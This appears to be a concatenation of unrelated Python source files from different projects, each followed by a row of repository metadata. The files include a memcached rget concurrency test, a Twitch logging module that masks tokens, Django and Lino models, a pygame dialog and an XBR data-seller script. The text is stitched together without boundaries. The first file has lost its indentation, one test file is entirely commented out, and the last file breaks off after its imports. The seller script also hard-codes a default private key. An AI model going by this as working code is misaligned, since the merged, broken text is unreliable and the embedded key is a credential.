value_line = line("^VALUE\s+([^\s]+)\s+(\d+)\s+(\d+)\r\n$", [('key', 's'), ('flags', 'd'), ('length', 'd')])
def get_results(s):
res = []
f = s.makefile()
while True:
l = sock_readline(f)
if l == 'END\r\n':
break
val_def = value_line.parse_line(l)
if not val_def:
raise ValueError("received unexpected line from rget: %s" % l)
val = sock_readline(f).rstrip()
if len(val) != val_def['length']:
raise ValueError("received value of unexpected length (expected %d, got %d: '%s')" % (val_def['length'], len(val), val))
res.append({'key': val_def['key'], 'value': val})
return res
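# Editor note (hedged): get_results() consumes a memcached-style response of the
# form 'VALUE <key> <flags> <length>\r\n<payload>\r\n ... END\r\n' and returns a
# list of {'key': ..., 'value': ...} dicts, validating each payload length.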
class TimeoutException(Exception):
pass
op = memcached_workload_common.option_parser_for_socket()
opts = op.parse(sys.argv)
# Test:
# start rget query, then start a write concurrently (but after rget got to the bottom of the tree)
# if the write blocks, then we do not do copy-on-write/snapshotting/etc.
# Also check that rget gets consistent data (i.e. is not affected by concurrent write), and that
# the write actually updates the data
rget_keys = 10000
updated_key_id = rget_keys-1
updated_key = gen_key('foo', updated_key_id)
updated_value = gen_value('changed', updated_key_id)
orig_value = gen_value('foo', updated_key_id)
host, port = opts["address"]
with memcached_workload_common.MemcacheConnection(host, port) as mc:
print "Creating test data"
for i in range(0, rget_keys):
mc.set(gen_key('foo', i), gen_value('foo', i))
with memcached_workload_common.make_socket_connection(opts) as s:
print "Starting rget"
s.send('rget %s %s %d %d %d\r\n' % (gen_key('foo', 0), gen_key('fop', 0), 0, 1, rget_keys))
print "Started rget"
        # we don't read the data, we just stop here, preventing rget from proceeding
# rget is slow to start, so we need to wait a bit, before it locks down the path.
# This is a crude way, but is probably the simplest
time.sleep(5)
with memcached_workload_common.make_socket_connection(opts) as us:
print "Starting concurrent update"
us.setblocking(1)
print " Sending concurrent set"
us.send('set %s 0 0 %d\r\n%s\r\n' % (updated_key, len(updated_value), updated_value))
uf = us.makefile()
us.settimeout(10.0)
print " Waiting for set result"
set_res = sock_readline(uf).rstrip()
if set_res != 'STORED':
raise ValueError("update failed: %s" % set_res)
print " Concurrent set finished"
v = mc.get(updated_key)
if v != updated_value:
raise ValueError("update didn't take effect")
res = get_results(s)
if len(res) != rget_keys:
raise ValueError("received unexpected number of results from rget (expected %d, got %d)" % (rget_keys, len(res)))
if res[updated_key_id]['value'] != orig_value:
raise ValueError("rget results are not consistent (update changed the contents of a part of running rget query)")
v = mc.get(updated_key)
if v != updated_value:
raise ValueError("update didn't take effect")
print "Done"
| agpl-3.0 | 7,748,596,986,973,659,000 | 34.692982 | 132 | 0.609978 | false | 3.368377 | false | false | false |
MrSprigster/script.module.python.twitch | resources/lib/twitch/log.py | 1 | 3253 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2016-2018 script.module.python.twitch
This file is part of script.module.python.twitch
SPDX-License-Identifier: GPL-3.0-only
See LICENSES/GPL-3.0-only for more information.
"""
import re
import logging
import copy
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
try:
import xbmc
except ImportError:
xbmc = None
def _mask(message):
mask = '*' * 11
masked_message = re.sub(r'((?:OAuth|Bearer)\s)[^\'"]+', r'\1' + mask, message)
masked_message = re.sub(r'(["\']email["\']:\s*[\'"])[^\'"]+', r'\1' + mask, masked_message)
masked_message = re.sub(r'(USER-IP=[\'"])[^\'"]+', r'\1' + mask, masked_message)
masked_message = re.sub(r'(["\']client_secret["\']:\s*[\'"])[^\'"]+', r'\1' + mask, masked_message)
masked_message = re.sub(r'(client_secret=).+?(&|$|\|)', r'\1' + mask + r'\2', masked_message)
masked_message = re.sub(r'(\\*["\']user_ip\\*["\']:\\*["\']).+?(\\*["\'])', r'\1' + mask + r'\2', masked_message)
masked_message = re.sub(r'(["\'](?:nauth)*sig["\']: ["\'])[^\'"]+', r'\1' + mask, masked_message)
return masked_message
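# Editor sketch (hedged): _mask() replaces secret-bearing values with eleven
# asterisks, e.g. _mask('Authorization: OAuth abc123') ->
# 'Authorization: OAuth ***********'.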
def _add_leader(message):
if xbmc:
message = 'script.module.python.twitch: %s' % message
return message
def prep_log_message(message):
message = copy.deepcopy(message)
message = _mask(message)
message = _add_leader(message)
return message
class Log:
def __init__(self):
if xbmc:
self._log = xbmc.log
else:
self._log = logging.getLogger('twitch')
self._log.addHandler(NullHandler())
def info(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGINFO)
else:
self._log.info(message)
def debug(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGDEBUG)
else:
self._log.debug(message)
def warning(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGWARNING)
else:
self._log.debug(message)
def error(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGERROR)
else:
self._log.error(message)
def critical(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGFATAL)
else:
self._log.critical(message)
def deprecated_query(self, old, new=None):
if new:
self.warning('DEPRECATED call to |{0}| detected, please use |{1}| instead'.format(old, new))
else:
self.warning('DEPRECATED call to |{0}| detected, no alternatives available'.format(old))
def deprecated_endpoint(self, old):
self.warning('DEPRECATED call to |{0}| endpoint detected'.format(old))
def deprecated_api_version(self, old, new, eol_date):
self.warning('API version |{0}| is deprecated, update to |{1}| by |{2}|'.format(old, new, eol_date))
log = Log()
| gpl-3.0 | -9,018,918,745,666,006,000 | 28.572727 | 117 | 0.571165 | false | 3.456961 | false | false | false |
Mchakravartula/rockstor-core | src/rockstor/storageadmin/models/pool_balance.py | 4 | 1243 | """
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.db import models
from storageadmin.models import Pool
class PoolBalance(models.Model):
pool = models.ForeignKey(Pool)
status = models.CharField(max_length=10, default='started')
    # django ztask uuid
tid = models.CharField(max_length=36, null=True)
message = models.CharField(max_length=1024, null=True)
start_time = models.DateTimeField(auto_now=True)
end_time = models.DateTimeField(null=True)
percent_done = models.IntegerField(default=0)
class Meta:
app_label = 'storageadmin'
| gpl-3.0 | 5,840,038,939,599,115,000 | 34.514286 | 68 | 0.752212 | false | 3.824615 | false | false | false |
kingsdigitallab/kdl-django | cms/templatetags/cms_tags.py | 1 | 2265 | from django import template
import random
register = template.Library()
@register.filter
def shuffle(arg):
aux = list(arg)[:]
random.shuffle(aux)
return aux
@register.assignment_tag(takes_context=True)
def get_request_parameters(context, exclude=None):
"""Returns a string with all the request parameters except the exclude
parameter."""
params = ''
request = context['request']
for key, value in request.GET.items():
if key != exclude:
params += '&{key}={value}'.format(key=key, value=value)
return params
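# Editor note (hedged): the returned string always starts with '&' when it is
# non-empty (e.g. '&page=2&sort=title'), so it is meant to be appended to an
# existing query string rather than to start one.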
@register.assignment_tag(takes_context=True)
def get_site_root(context):
"""Returns the site root Page, not the implementation-specific model used.
Object-comparison to self will return false as objects would differ.
:rtype: `wagtail.wagtailcore.models.Page`
"""
return context['request'].site.root_page
@register.inclusion_tag('cms/tags/main_menu.html', takes_context=True)
def main_menu(context, root, current_page=None):
"""Returns the main menu items, the children of the root page. Only live
pages that have the show_in_menus setting on are returned."""
menu_pages = root.get_children().live().in_menu()
root.active = (current_page.url == root.url
if current_page else False)
for page in menu_pages:
page.active = (current_page.url.startswith(page.url)
if current_page else False)
return {'request': context['request'], 'root': root,
'current_page': current_page, 'menu_pages': menu_pages}
@register.inclusion_tag('cms/tags/footer_menu.html', takes_context=True)
def footer_menu(context, root, current_page=None):
"""Returns the main menu items, the children of the root page. Only live
pages that have the show_in_menus setting on are returned."""
menu_pages = root.get_children().live().in_menu()
root.active = (current_page.url == root.url
if current_page else False)
for page in menu_pages:
page.active = (current_page.url.startswith(page.url)
if current_page else False)
return {'request': context['request'], 'root': root,
'current_page': current_page, 'menu_pages': menu_pages}
| mit | -278,838,461,996,839,740 | 31.826087 | 78 | 0.660927 | false | 3.878425 | false | false | false |
mozts2005/OuterSpace | client-pygame/lib/osci/dialog/ChangeQtyDlg.py | 1 | 2682 | #
# Copyright 2001 - 2006 Ludek Smid [http://www.ospace.net/]
#
# This file is part of IGE - Outer Space.
#
# IGE - Outer Space is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# IGE - Outer Space is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with IGE - Outer Space; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
import pygameui as ui
from osci import client, gdata, res
class ChangeQtyDlg:
def __init__(self, app):
self.app = app
self.createUI()
def display(self, quantity, confirmAction = None):
self.confirmAction = confirmAction
self.win.vQuantity.text = str(quantity)
self.win.show()
self.app.setFocus(self.win.vQuantity)
# register for updates
if self not in gdata.updateDlgs:
gdata.updateDlgs.append(self)
def hide(self):
self.win.setStatus(_("Ready."))
self.win.hide()
# unregister updates
if self in gdata.updateDlgs:
gdata.updateDlgs.remove(self)
def update(self):
self.show()
def onOK(self, widget, action, data):
try:
self.quantity = int(self.win.vQuantity.text)
except ValueError:
self.win.setStatus(_("Specify quantity (1, 2, 3, ...)."))
return
self.hide()
if self.confirmAction:
self.confirmAction()
def onCancel(self, widget, action, data):
self.quantity = None
self.hide()
def createUI(self):
w, h = gdata.scrnSize
self.win = ui.Window(self.app,
modal = 1,
escKeyClose = 1,
movable = 0,
title = _('Change quantity'),
rect = ui.Rect((w - 264) / 2, (h - 104) / 2, 264, 104),
layoutManager = ui.SimpleGridLM(),
)
# creating dialog window
self.win.subscribeAction('*', self)
ui.Label(self.win,
text = _("New quantity:"),
align = ui.ALIGN_E,
layout = (0, 1, 6, 1)
)
ui.Entry(self.win, id = 'vQuantity',
align = ui.ALIGN_W,
layout = (6, 1, 3, 1),
#text = self.quantity,
)
ui.Title(self.win, layout = (0, 3, 3, 1))
ui.TitleButton(self.win, layout = (3, 3, 5, 1), text = _("Cancel"), action = "onCancel")
okBtn = ui.TitleButton(self.win, layout = (8, 3, 5, 1), text = _("OK"), action = 'onOK')
        self.win.acceptButton = okBtn
 | gpl-2.0 | -9,214,543,163,955,698,000 | 28.157303 | 90 | 0.64877 | false | 3.02027 | false | false | false |
crossbario/crossbar-examples | xbr/teststack1/python/seller.py | 3 | 2590 | import binascii
import os
from uuid import UUID
import txaio
txaio.use_twisted()
from autobahn.twisted.component import Component, run
from autobahn.twisted.util import sleep
from autobahn.twisted.xbr import SimpleSeller
from autobahn.wamp.types import PublishOptions
market_maker_adr = os.environ.get('XBR_MARKET_MAKER_ADR', '0x3e5e9111ae8eb78fe1cc3bb8915d5d461f3ef9a9')
print('market_maker_adr', market_maker_adr)
market_maker_adr = binascii.a2b_hex(market_maker_adr[2:])
seller_priv_key = os.environ.get('XBR_SELLER_PRIVKEY', '0xadd53f9a7e588d003326d1cbf9e4a43c061aadd9bc938c843a79e7b4fd2ad743')
print('seller_priv_key', seller_priv_key)
seller_priv_key = binascii.a2b_hex(seller_priv_key[2:])
comp = Component(
transports=os.environ.get('XBR_INSTANCE', 'ws://edge1:8080/ws'),
realm=os.environ.get('XBR_REALM', 'realm1'),
extra={
'market_maker_adr': market_maker_adr,
'seller_privkey': seller_priv_key,
}
)
running = False
@comp.on_join
async def joined(session, details):
print('Seller session joined', details)
global running
running = True
# market_maker_adr = binascii.a2b_hex(session.config.extra['market_maker_adr'][2:])
market_maker_adr = session.config.extra['market_maker_adr']
print('Using market maker adr:', session.config.extra['market_maker_adr'])
# seller_privkey = binascii.a2b_hex(session.config.extra['seller_privkey'][2:])
seller_privkey = session.config.extra['seller_privkey']
api_id = UUID('627f1b5c-58c2-43b1-8422-a34f7d3f5a04').bytes
topic = 'io.crossbar.example'
counter = 1
seller = SimpleSeller(market_maker_adr, seller_privkey)
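    # Editor note (hedged): XBR amounts use 18 decimals like ERC-20 tokens, so
    # 35 * 10 ** 18 below is 35 XBR (the balance print above divides by 10**18
    # for the same reason); `interval` is assumed to be the key rotation
    # interval in seconds.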
price = 35 * 10 ** 18
interval = 10
seller.add(api_id, topic, price, interval, None)
balance = await seller.start(session)
balance = int(balance / 10 ** 18)
print("Remaining balance: {} XBR".format(balance))
while running:
payload = {'data': 'py-seller', 'counter': counter}
key_id, enc_ser, ciphertext = await seller.wrap(api_id,
topic,
payload)
pub = await session.publish(topic, key_id, enc_ser, ciphertext,
options=PublishOptions(acknowledge=True))
print('Published event {}: {}'.format(pub.id, payload))
counter += 1
await sleep(1)
@comp.on_leave
def left(session, details):
print('Seller session left', details)
global running
running = False
if __name__ == '__main__':
run([comp])
| apache-2.0 | -5,349,200,474,632,949,000 | 29.833333 | 124 | 0.654054 | false | 3.112981 | false | false | false |
khchine5/lino-welfare | lino_welfare/modlib/badges/models.py | 1 | 2307 | # -*- coding: UTF-8 -*-
# Copyright 2014-2015 Luc Saffre
# This file is part of Lino Welfare.
#
# Lino Welfare is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Lino Welfare is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with Lino Welfare. If not, see
# <http://www.gnu.org/licenses/>.
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
logger = logging.getLogger(__name__)
from django.db import models
from django.utils.translation import ugettext_lazy as _
from lino.api import dd
from lino import mixins
config = dd.plugins.badges
class Badge(mixins.BabelNamed):
class Meta:
verbose_name = _("Badge")
verbose_name_plural = _("Badges")
class Badges(dd.Table):
model = 'badges.Badge'
required_roles = dd.login_required(dd.SiteStaff)
class Award(dd.Model):
class Meta:
verbose_name = _("Badge Award")
verbose_name_plural = _("Badge Awards")
holder = dd.ForeignKey(
config.holder_model,
verbose_name=_("Holder"))
badge = dd.ForeignKey('badges.Badge')
date = models.DateField(
_("Date"), default=dd.today)
result = models.CharField(
_("Result"),
blank=True, max_length=200)
remark = models.CharField(
_("Remark"),
blank=True, max_length=200)
class Awards(dd.Table):
model = 'badges.Award'
required_roles = dd.login_required(dd.SiteStaff)
class AwardsByHolder(Awards):
label = _("Awards")
required_roles = dd.login_required()
master_key = 'holder'
column_names = 'date badge result remark'
auto_fit_column_widths = True
class AwardsByBadge(Awards):
label = _("Awards")
required_roles = dd.login_required()
master_key = 'badge'
column_names = 'date holder result remark'
auto_fit_column_widths = True
| agpl-3.0 | 3,762,063,786,132,441,000 | 25.517241 | 70 | 0.680971 | false | 3.582298 | false | false | false |
BGS/Rogentos-Irc-Bot | bot.py | 1 | 6177 | '''
Rogentos IrcBot: Irc Bot
Copyright (C) Blaga Florentin Gabriel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
#!/usr/bin/env python
import socket
import sys
import datetime
from time import sleep
root_admins = ["bgs", "blacknoxis"]
class BotCore:
def __init__(self, host, port, nick, channel, password=""):
self.irc_host = host
self.irc_port = port
self.irc_nick = nick
self.irc_channel = channel
self.joined_channels = []
self.irc_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.is_connected = False
self.reconnect = False
self.command = ""
self.connect()
def connect(self):
self.reconnect = True
try:
self.irc_sock.connect (( self.irc_host, self.irc_port))
except:
print ("Error: Could not connect to IRC; Host: %s Port: %s" % (self.irc_host, self.irc_port))
print ("Connected to: %s:%s" %(self.irc_host,self.irc_port))
self.irc_sock.send("USER %s %s %s :This bot belongs to BGS.\n" % (self.irc_nick, self.irc_nick, self.irc_nick))
self.irc_sock.send("NICK %s\n" % self.irc_nick)
self.irc_sock.send("JOIN %s\n" % self.irc_channel)
self.is_connected = True
self.listen()
def listen(self):
while self.is_connected:
recv = self.irc_sock.recv(4096)
recv = recv.strip('\n\r')
print recv
if str(recv).find ("PING") != -1:
self.irc_sock.send("PONG :pingis\n")
if str(recv).find ("JOIN") != -1:
irc_user_nick = str(recv).split()[0].split('!')[0].split(':')[1]
channel = str(recv).split()[2]
if channel == self.irc_channel and irc_user_nick != self.irc_nick:
self.send_message_to_channel("""Bine ai venit %s pe canalul %s! \n""" % (irc_user_nick, channel) , channel)
if str(recv).find ("PRIVMSG") != -1:
self.irc_user_nick = str(recv).split()[0].split('!')[0].split(':')[1]
irc_user_message = self.message_to_data(str(recv))
print ( self.irc_user_nick + ": " + ''.join(irc_user_message))
try:
if (''.join(irc_user_message)[0] == "."):
if str(recv).split()[2] == self.irc_nick:
self.command = ''.join(irc_user_message)[1:]
self.process_command(self.irc_user_nick.lower(), self.irc_channel)
else:
self.command = ''.join(irc_user_message)[1:]
self.process_command(self.irc_user_nick.lower(), ((str(recv)).split()[2]))
except IndexError:
pass
if self.reconnect:
self.connect()
def message_to_data(self, message):
data = message.split()
data = ' '.join(data[3:]).split(':')[1:]
return data
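    # Editor note (hedged): for a raw IRC line such as
    #   ':nick!user@host PRIVMSG #chan :hello world'
    # the method drops the prefix/verb/target tokens and splits the remainder
    # on ':', returning the message body, e.g. ['hello world'].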
def send_message_to_channel(self,message,channel):
print (( "%s: %s") % (self.irc_nick, message))
self.irc_sock.send( (("PRIVMSG %s :%s\r\n") % (channel, message)).encode() )
def process_command(self, user, channel):
if (len(self.command.split()) == 0):
return
command = (self.command).lower()
command = command.split()
if (user in root_admins):
if (command[0] == 'help'):
self.send_message_to_channel("""Available Admin Only Commands:\n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel(""".jchs chan1 chan2 chan3 chan4 \n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel("""Join speciffied channels.\n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel(""".gmsg <message> \n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel("""Send a global message to joined channels! \n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel(""".say <message>""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel("""Write message on channel.""", self.irc_user_nick)
if (command[0] == "say"):
self.send_message_to_channel( ' '.join(command[1:]), channel)
if (command[0] == 'jchs'):
channels = command[1:]
for c in channels:
self.irc_sock.send("JOIN %s\n" % c)
self.joined_channels.append(c)
if (command[0] == 'gmsg'):
for c in self.joined_channels:
self.send_message_to_channel( ' '.join(command[1:]), c )
if (command[0] == "hello"):
self.send_message_to_channel("Hello to you too, %s . Today is : %s" % (user, datetime.datetime.now().strftime("%Y-%m-%d %H:%M")), channel)
if (command[0] == "help"):
self.send_message_to_channel("""Available Unprivileged Commands:\n""", self.irc_user_nick)
self.send_message_to_channel(""".hello""", self.irc_user_nick)
self.send_message_to_channel("""Say hi!""", self.irc_user_nick)
if (command[0] == "owner"):
self.send_message_to_channel("""I belong to %s.""" % root_admins[0] , channel)
if __name__ == '__main__':
BotCore("irc.freenode.net", 6667, "DarthNoxis", "#rogentos-dezvoltare")
| gpl-3.0 | 1,544,610,265,993,985,300 | 41.020408 | 151 | 0.54363 | false | 3.648553 | false | false | false |
yasir1brahim/OLiMS | lims/controlpanel/bika_containertypes.py | 2 | 3299 | from dependencies.dependency import ClassSecurityInfo
from dependencies.dependency import schemata
from dependencies import atapi
from dependencies.dependency import registerType
from dependencies.dependency import getToolByName
from lims.browser.bika_listing import BikaListingView
from lims.config import PROJECTNAME
from lims import bikaMessageFactory as _
from lims.utils import t
from lims.content.bikaschema import BikaFolderSchema
from lims.interfaces import IContainerTypes
from dependencies.dependency import IViewView
from dependencies.dependency import IFolderContentsView
from dependencies.folder import ATFolder, ATFolderSchema
from dependencies.dependency import implements
from operator import itemgetter
class ContainerTypesView(BikaListingView):
implements(IFolderContentsView, IViewView)
def __init__(self, context, request):
super(ContainerTypesView, self).__init__(context, request)
self.catalog = 'bika_setup_catalog'
self.contentFilter = {'portal_type': 'ContainerType',
'sort_on': 'sortable_title'}
self.context_actions = {_('Add'):
{'url': 'createObject?type_name=ContainerType',
'icon': '++resource++bika.lims.images/add.png'}}
self.title = self.context.translate(_("Container Types"))
self.icon = self.portal_url + "/++resource++bika.lims.images/container_big.png"
self.description = ""
self.show_sort_column = False
self.show_select_row = False
self.show_select_column = True
self.pagesize = 25
self.columns = {
'Title': {'title': _('Container Type'),
'index':'sortable_title'},
'Description': {'title': _('Description'),
'index': 'description',
'toggle': True},
}
self.review_states = [
{'id':'default',
'title': _('Active'),
'contentFilter': {'inactive_state': 'active'},
'transitions': [{'id':'deactivate'}, ],
'columns': ['Title',
'Description']},
{'id':'inactive',
'title': _('Dormant'),
'contentFilter': {'inactive_state': 'inactive'},
'transitions': [{'id':'activate'}, ],
'columns': ['Title',
'Description']},
{'id':'all',
'title': _('All'),
'contentFilter':{},
'columns': ['Title',
'Description']},
]
def folderitems(self):
items = BikaListingView.folderitems(self)
for x in range(len(items)):
            if 'obj' not in items[x]: continue
obj = items[x]['obj']
items[x]['Description'] = obj.Description()
items[x]['replace']['Title'] = "<a href='%s'>%s</a>" % \
(items[x]['url'], items[x]['Title'])
return items
schema = ATFolderSchema.copy()
class ContainerTypes(ATFolder):
implements(IContainerTypes)
displayContentsTab = False
schema = schema
schemata.finalizeATCTSchema(schema, folderish = True, moveDiscussion = False)
atapi.registerType(ContainerTypes, PROJECTNAME)
| agpl-3.0 | 1,310,875,499,270,571,800 | 37.360465 | 87 | 0.588057 | false | 4.43414 | false | false | false |
LuisAlejandro/tribus | tribus/common/charms/tests/test_directory.py | 2 | 9024 | # import gc
# import os
# import hashlib
# import inspect
# import shutil
# import zipfile
# from juju.errors import CharmError, FileNotFound
# from juju.charm.errors import InvalidCharmFile
# from juju.charm.metadata import MetaData
# from juju.charm.directory import CharmDirectory
# from juju.charm.bundle import CharmBundle
# from juju.lib import serializer
# from juju.lib.filehash import compute_file_hash
# from juju.charm import tests
# from juju.charm.tests.test_repository import RepositoryTestBase
# sample_directory = os.path.join(
# os.path.dirname(
# inspect.getabsfile(tests)), "repository", "series", "dummy")
# class DirectoryTest(RepositoryTestBase):
# def setUp(self):
# super(DirectoryTest, self).setUp()
# # Ensure the empty/ directory exists under the dummy sample
# # charm. Depending on how the source code is exported,
# # empty directories may be ignored.
# empty_dir = os.path.join(sample_directory, "empty")
# if not os.path.isdir(empty_dir):
# os.mkdir(empty_dir)
# def copy_charm(self):
# dir_ = os.path.join(self.makeDir(), "sample")
# shutil.copytree(sample_directory, dir_)
# return dir_
# def delete_revision(self, dir_):
# os.remove(os.path.join(dir_, "revision"))
# def set_metadata_revision(self, dir_, revision):
# metadata_path = os.path.join(dir_, "metadata.yaml")
# with open(metadata_path) as f:
# data = serializer.yaml_load(f.read())
# data["revision"] = 999
# with open(metadata_path, "w") as f:
# f.write(serializer.yaml_dump(data))
# def test_metadata_is_required(self):
# directory = self.makeDir()
# self.assertRaises(FileNotFound, CharmDirectory, directory)
# def test_no_revision(self):
# dir_ = self.copy_charm()
# self.delete_revision(dir_)
# charm = CharmDirectory(dir_)
# self.assertEquals(charm.get_revision(), 0)
# with open(os.path.join(dir_, "revision")) as f:
# self.assertEquals(f.read(), "0\n")
# def test_nonsense_revision(self):
# dir_ = self.copy_charm()
# with open(os.path.join(dir_, "revision"), "w") as f:
# f.write("shifty look")
# err = self.assertRaises(CharmError, CharmDirectory, dir_)
# self.assertEquals(
# str(err),
# "Error processing %r: invalid charm revision 'shifty look'" % dir_)
# def test_revision_in_metadata(self):
# dir_ = self.copy_charm()
# self.delete_revision(dir_)
# self.set_metadata_revision(dir_, 999)
# log = self.capture_logging("juju.charm")
# charm = CharmDirectory(dir_)
# self.assertEquals(charm.get_revision(), 999)
# self.assertIn(
# "revision field is obsolete. Move it to the 'revision' file.",
# log.getvalue())
# def test_competing_revisions(self):
# dir_ = self.copy_charm()
# self.set_metadata_revision(dir_, 999)
# log = self.capture_logging("juju.charm")
# charm = CharmDirectory(dir_)
# self.assertEquals(charm.get_revision(), 1)
# self.assertIn(
# "revision field is obsolete. Move it to the 'revision' file.",
# log.getvalue())
# def test_set_revision(self):
# dir_ = self.copy_charm()
# charm = CharmDirectory(dir_)
# charm.set_revision(123)
# self.assertEquals(charm.get_revision(), 123)
# with open(os.path.join(dir_, "revision")) as f:
# self.assertEquals(f.read(), "123\n")
# def test_info(self):
# directory = CharmDirectory(sample_directory)
# self.assertTrue(directory.metadata is not None)
# self.assertTrue(isinstance(directory.metadata, MetaData))
# self.assertEquals(directory.metadata.name, "dummy")
# self.assertEquals(directory.type, "dir")
# def test_make_archive(self):
# # make archive from sample directory
# directory = CharmDirectory(sample_directory)
# f = self.makeFile(suffix=".charm")
# directory.make_archive(f)
# # open archive in .zip-format and assert integrity
# from zipfile import ZipFile
# zf = ZipFile(f)
# self.assertEqual(zf.testzip(), None)
# # assert included
# included = [info.filename for info in zf.infolist()]
# self.assertEqual(
# set(included),
# set(("metadata.yaml", "empty/", "src/", "src/hello.c",
# "config.yaml", "hooks/", "hooks/install", "revision")))
# def test_as_bundle(self):
# directory = CharmDirectory(self.sample_dir1)
# charm_bundle = directory.as_bundle()
# self.assertEquals(type(charm_bundle), CharmBundle)
# self.assertEquals(charm_bundle.metadata.name, "sample")
# self.assertIn("sample-1.charm", charm_bundle.path)
# total_compressed = 0
# total_uncompressed = 0
# zip_file = zipfile.ZipFile(charm_bundle.path)
# for n in zip_file.namelist():
# info = zip_file.getinfo(n)
# total_compressed += info.compress_size
# total_uncompressed += info.file_size
# self.assertTrue(total_compressed < total_uncompressed)
# def test_as_bundle_file_lifetime(self):
# """
# The temporary bundle file created should have a life time
# equivalent to that of the directory object itself.
# """
# directory = CharmDirectory(self.sample_dir1)
# charm_bundle = directory.as_bundle()
# gc.collect()
# self.assertTrue(os.path.isfile(charm_bundle.path))
# del directory
# gc.collect()
# self.assertFalse(os.path.isfile(charm_bundle.path))
# def test_compute_sha256(self):
# """
# Computing the sha256 of a directory will use the bundled
# charm, since the hash of the file itself is needed.
# """
# directory = CharmDirectory(self.sample_dir1)
# sha256 = directory.compute_sha256()
# charm_bundle = directory.as_bundle()
# self.assertEquals(type(charm_bundle), CharmBundle)
# self.assertEquals(compute_file_hash(hashlib.sha256,
# charm_bundle.path),
# sha256)
# def test_as_bundle_with_relative_path(self):
# """
# Ensure that as_bundle works correctly with relative paths.
# """
# current_dir = os.getcwd()
# os.chdir(self.sample_dir2)
# self.addCleanup(os.chdir, current_dir)
# charm_dir = "../%s" % os.path.basename(self.sample_dir1)
# directory = CharmDirectory(charm_dir)
# charm_bundle = directory.as_bundle()
# self.assertEquals(type(charm_bundle), CharmBundle)
# self.assertEquals(charm_bundle.metadata.name, "sample")
# def test_charm_base_inheritance(self):
# """
# get_sha256() should be implemented in the base class,
# and should use compute_sha256 to calculate the digest.
# """
# directory = CharmDirectory(self.sample_dir1)
# bundle = directory.as_bundle()
# digest = compute_file_hash(hashlib.sha256, bundle.path)
# self.assertEquals(digest, directory.get_sha256())
# def test_as_directory(self):
# directory = CharmDirectory(self.sample_dir1)
# self.assertIs(directory.as_directory(), directory)
# def test_config(self):
# """Validate that ConfigOptions are available on the charm"""
# from juju.charm.tests.test_config import sample_yaml_data
# directory = CharmDirectory(sample_directory)
# self.assertEquals(directory.config.get_serialization_data(),
# sample_yaml_data)
# def test_file_type(self):
# charm_dir = self.copy_charm()
# os.mkfifo(os.path.join(charm_dir, "foobar"))
# directory = CharmDirectory(charm_dir)
# e = self.assertRaises(InvalidCharmFile, directory.as_bundle)
# self.assertIn("foobar' Invalid file type for a charm", str(e))
# def test_internal_symlink(self):
# charm_path = self.copy_charm()
# external_file = self.makeFile(content='baz')
# os.symlink(external_file, os.path.join(charm_path, "foobar"))
# directory = CharmDirectory(charm_path)
# e = self.assertRaises(InvalidCharmFile, directory.as_bundle)
# self.assertIn("foobar' Absolute links are invalid", str(e))
# def test_extract_symlink(self):
# charm_path = self.copy_charm()
# external_file = self.makeFile(content='lorem ipsum')
# os.symlink(external_file, os.path.join(charm_path, "foobar"))
# directory = CharmDirectory(charm_path)
# e = self.assertRaises(InvalidCharmFile, directory.as_bundle)
# self.assertIn("foobar' Absolute links are invalid", str(e))
| gpl-3.0 | 4,949,863,388,452,353,000 | 38.578947 | 81 | 0.607602 | false | 3.403998 | true | false | false |
ecreall/nova-ideo | novaideo/connectors/google/views/create.py | 1 | 1201 | # Copyright (c) 2014 by Ecreall under licence AGPL terms
# avalaible on http://www.gnu.org/licenses/agpl.html
# licence: AGPL
# author: Amen Souissi
from pyramid.view import view_config
from dace.processinstance.core import DEFAULTMAPPING_ACTIONS_VIEWS
from pontus.default_behavior import Cancel
from pontus.form import FormView
from pontus.schema import select
from novaideo.connectors.google.content.behaviors import CreateConnector
from novaideo.connectors.google import GoogleConnectorSchema, GoogleConnector
